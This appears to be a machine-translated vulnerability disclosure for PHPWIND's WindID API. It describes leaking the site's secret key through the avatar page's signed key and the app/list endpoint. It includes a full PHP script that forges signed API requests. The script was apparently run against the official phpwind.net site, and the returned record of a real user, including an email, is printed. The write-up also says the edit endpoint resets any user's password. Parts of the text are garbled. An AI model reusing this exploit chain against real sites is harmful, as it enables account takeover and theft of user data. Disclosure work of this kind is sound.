A high-risk PHPWIND shell Vulnerability
I didn't expect PHPWIND to commit the same vulnerability as PHPCMS.
Code in src/applications/windidserver/api/controller/AppController. php:
public function listAction() {$result = $this->_getAppDs()->getList();$this->output($result);}
How do I obtain the key that can access the interface?
You can view the Avatar upload page:
/Phpwind/src/windid/service/user/srv/WindidUserService. php
Internal code:
$key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'flash'), array('uid'=>'undefined'));
Go to the Avatar page and check the source file.
Http: // localhost/phpwind/index. php? M = profile & c = avatar & _ left = avatar
Urldecode:
Http: // localhost/phpwind/windid/index. php? M = api & c = avatar & a = doAvatar & uid = 1 & windidkey = f5b35f56c88695b9069e18ecaafad874 & time = 1408197299 & clientid = 1 & type = flash & avatar = http: // localhost/phpwind/windid/attachment/avatar/000/00/00/1 .jpg? R = 88418.
Remove
& Avatar = http: // localhost/phpwind/windid/attachment/avatar/000/00/00/1 .jpg? R = 88418.
Remember to POST a uid that is equal to undefined
Replace doAvatar with list and avatar with app:
Http: // localhost/phpwind/windid/index. php? M = api & c = app & a = list & uid = 1 & windidkey = f5b35f56c88695b9069e18ecaafad874 & time = 1408197299 & clientid = 1 & type = flash
POST: uid = undefined
D:
{"1": {"id": "1", "name": "phpwind9.0", "siteurl": "http: \/localhost \/phpwind ", "siteip": "", "secretkey": "73e3dcdd733c7c3733c17273a624e162", "apifile": "windid. php "," charset ":" gbk "," issyn ":" 1 "," ispolicy ":" 1 "}}
With this key, I can do too many things, and I can do everything in the user system.
With this key, I can do too many things, and I can do everything in the user system.
I tested it on the official website, obtained the key, and tested to read the information of a user:
<?php$secretkey = '308c6c43a*****279dd61dd80e8d59bd';$c = 'user';$a = 'get';$data = array('uid'=>'658925');$time = time();$key = appKey('1', time(), $secretkey, array('userid'=>658925), $data);echo post('http://www.phpwind.net/windid/index.php?m=api&c='.$c.'&a='.$a.'&windidkey='.$key.'&time='.$time .'&clientid=1&userid=658925',$data);function post($uri,$data) {$ch = curl_init ();curl_setopt ( $ch, CURLOPT_URL, $uri );curl_setopt ( $ch, CURLOPT_POST, 1 );curl_setopt ( $ch, CURLOPT_HEADER, 0 );curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );$return = curl_exec ( $ch );curl_close ( $ch );return $return;}function appKey($apiId, $time, $secretkey, $get, $post) {$array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token', 'Filename', 'Upload', 'token');$str = '';ksort($get);ksort($post);foreach ($get AS $k=>$v) {if (in_array($k, $array)) continue;$str .=$k.$v;}foreach ($post AS $k=>$v) {if (in_array($k, $array)) continue;$str .=$k.$v;}return md5(md5($apiId.'||'.$secretkey).$time.$str);}?>
{"Uid": "658925", "username": "phpwind", "email": "fengyu@phpwind.net", "safecv": "5b4111de", "regdate ": "1143101940", "regip ":""}
There is also an edit interface in the User's api, which can modify the password of any User and call it. Without entering the old_password, you can change the password of any User without verifying the original password.
Solution:
Do not trust the key. You can add m, a, and c to the key operation.